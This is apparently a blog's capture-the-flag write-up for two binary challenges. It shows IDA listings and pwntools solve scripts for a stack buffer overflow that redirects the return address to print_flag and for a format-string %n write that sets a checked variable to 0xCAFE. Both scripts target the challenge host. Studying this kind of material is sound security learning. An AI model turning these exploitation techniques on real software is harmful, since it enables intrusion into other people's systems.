blog http://blog.yutian233.xyz/
C is hard
➜ ctf21 checksec source_fixed
[*] '/home/yutian/ctf21/source_fixed'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
IDA
main
/* main() as decompiled by IDA (pseudo-C, not compilable as-is).
 * Prints a banner, calls vuln(), then prints a second message and exits 0.
 * The "This is not my function :" line is only reached if vuln() returns
 * normally; print_flag() below has no call site anywhere in the code shown. */
int __cdecl main(int argc, const char **argv, const char **envp)
{
__int64 v3; // rdx -- never assigned; looks like a stale-register artifact of the decompiler
__int64 v5; // [rsp-8h] [rbp-8h]
__asm { endbr64 }
/* The extra argv/envp "arguments" are presumably leftover register contents the
 * decompiler attached to a puts-like call; they carry no meaning here. */
puts_0("I will give you my secret if you can run my function", argv, envp);
/* vuln's own disassembly (below) never reads rdi, so this argument is
 * presumably an artifact too; vuln works on its own 0x20-byte frame. */
vuln((__int64)&v5);
puts_0("This is not my function :", argv, v3);
return 0;
}
vuln
; vuln: IDA disassembly, addresses as shown. Reserves a 0x20-byte frame,
; hands its start to sub_4010B0 with no length argument, then returns.
.text:000000000040121A public vuln
.text:000000000040121A vuln proc near ; CODE XREF: main+19↓p
.text:000000000040121A ; __unwind {
.text:000000000040121A endbr64
.text:000000000040121E push rbp                ; saved rbp lands at [rbp]; the return address sits at [rbp+8]
.text:000000000040121F mov rbp, rsp
.text:0000000000401222 sub rsp, 20h            ; 0x20 bytes of locals: the buffer spans [rbp-20h, rbp)
.text:0000000000401226 lea rax, [rbp-20h]      ; rax = start of that buffer
.text:000000000040122A mov rdi, rax            ; rdi = only argument passed; no size/limit is placed in rsi/rdx
.text:000000000040122D mov eax, 0              ; al=0 is the SysV convention before calling a variadic function (scanf-family?); callee body not shown
.text:0000000000401232 call sub_4010B0         ; if the callee writes past 0x20 bytes it reaches saved rbp and, 0x28 bytes in, the return address; checksec above reports no stack canary
.text:0000000000401237 nop
.text:0000000000401238 leave
.text:0000000000401239 retn                    ; jumps to whatever [rbp+8] holds; fix: a bounded read (fgets / width-limited %s) plus -fstack-protector
.text:0000000000401239 ; } // starts at 40121A
.text:0000000000401239 vuln endp
print_flag
/* print_flag: decompiled by IDA. Opens "flag.txt", reads up to 64 bytes into
 * the global `flag`, and prints it wrapped in ANSI colour codes.
 * Nothing in the code shown calls it; the "@<rbp>" in the signature is how IDA
 * renders a function it only ever saw entered with rbp still live -- presumably
 * because it is reached by a return rather than a call. */
__int64 __usercall print_flag@<rax>(__int64 a1@<rbp>)
{
__int64 v1; // ST08_8
__int64 v3; // [rsp-8h] [rbp-8h]
__asm { endbr64 }
v3 = a1; /* keeps the incoming rbp; never read afterwards */
/* (path, second-arg) shape suggests fopen(); unk_402008 would then be the
 * mode string. Its contents are not in the listing, so this is unconfirmed. */
v1 = sub_4010C0("flag.txt", &unk_402008);
/* (buf, 64, stream) shape matches fgets(). v1 is never checked, so a missing
 * flag.txt would pass a null stream straight into this call. */
sub_4010A0(&flag, 64LL, v1);
/* printf-like call with a constant format string: no format-string exposure
 * here, the only %s arguments are the colour codes and the flag buffer. */
return sub_401090(" Thanks for running my function, here is my secret : %s%s%s", "\x1B[38;5;83m", &flag, "\x1B[0m");
}
exp
# Solve script for the "C is hard" challenge above.
# It relies on two facts visible in the listings: vuln() reads into a
# 0x20-byte frame buffer with no length limit, and the binary is non-PIE
# (0x400000), so code addresses are fixed.
from pwn import *
#io = process("./source_fixed")
io = remote("chall.codefest.tech", 8782)
# Presumably print_flag's entry address. It is not shown in the IDA output
# above (only vuln's 0x40121A is), so it is taken on trust from the author.
flag_addr = 0x04011B6
# 0x28 = 0x20 bytes of buffer + 8 bytes of saved rbp: exactly the distance
# from [rbp-20h] to the return address at [rbp+8] in vuln's frame. The next
# 8 bytes replace that return address; with no canary (see checksec) nothing
# detects the overwrite before `retn`.
payload = cyclic(0x28) + p64(flag_addr)
# Wait for main's banner so the input lands in vuln's read, not earlier.
io.recvuntil("I will give you my secret if you can run my function")
io.sendline(payload)
io.interactive()
Take me to a cafe
exp
# Solve script for the "Take me to a cafe" challenge. The binary itself is
# not shown on this page; p32() and the 0x0804xxxx address imply a 32-bit,
# non-PIE target -- unconfirmed.
from pwn import *
# io = process("./format")
io = remote("chall.codefest.tech", 8745)
# context.log_level='debug'
# Address of the variable the challenge checks; not derivable from this page.
c_addr = 0x0804C044
# Format-string write: the 4-byte address goes first, `%51962d` pads the
# output so the running character count when `%4$n` fires is
# 4 + 51962 = 51966 = 0xCAFE, and `%4$n` stores that count through the 4th
# variadic slot -- which the script assumes is where the start of this input
# sits on the stack.
# Root cause on the target side is user input being used as the format
# argument; the fix is printf("%s", buf) and building with -Wformat-security.
payload = p32(c_addr) + b'%51962d' + b'%4$n'
io.sendline(payload)
io.interactive()